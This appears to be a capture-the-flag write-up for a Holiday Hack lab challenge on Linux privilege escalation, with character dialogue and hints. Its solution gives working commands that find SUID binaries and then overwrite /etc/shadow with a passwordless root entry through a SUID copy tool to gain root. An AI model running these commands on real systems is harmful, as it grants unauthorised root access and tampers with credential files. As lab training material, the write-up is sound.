Linux PrivEsc⚓︎
Difficulty:
Direct link: Objective URL
Objective⚓︎
Request
Rosemold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.
Rose Mold
What am I doing in this saloon? The better question is: what planet are you from?
Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here.
Hints⚓︎
Linux Privilege Escalation Techniques
There's various ways to escalate privileges on a Linux system.https://payatu.com/blog/a-guide-to-linux-privilege-escalation/
Linux Command Injection
Use the privileged binary to overwriting a file to escalate privileges could be a solution, but there's an easier method if you pass it a crafty argument..
Solution⚓︎
Upon obtaining console access to the terminal, we started exploring interesting files on filesystem
find / -perm -u+s 2>/dev/null
And we found binary /usr/bin/simplecopy . This binary can copy any file from the system even with root permission. So the plan was to take over root permissions.
Next we checked directory /etc/shadow for its structure. Create simple sh2 file with root account without password.
echo -e "root::19634:0:99999:7:::" > sh2
Next using simplecopy binary we modified /etc/shadow file and from now "su" did not require any password so we could freely use root account
simplecopy sh2 /etc/shadow
su
Images⚓︎
Answer
"santa"
Response⚓︎
Rose Mold
Yup, I knew you knew. You just have that vibe.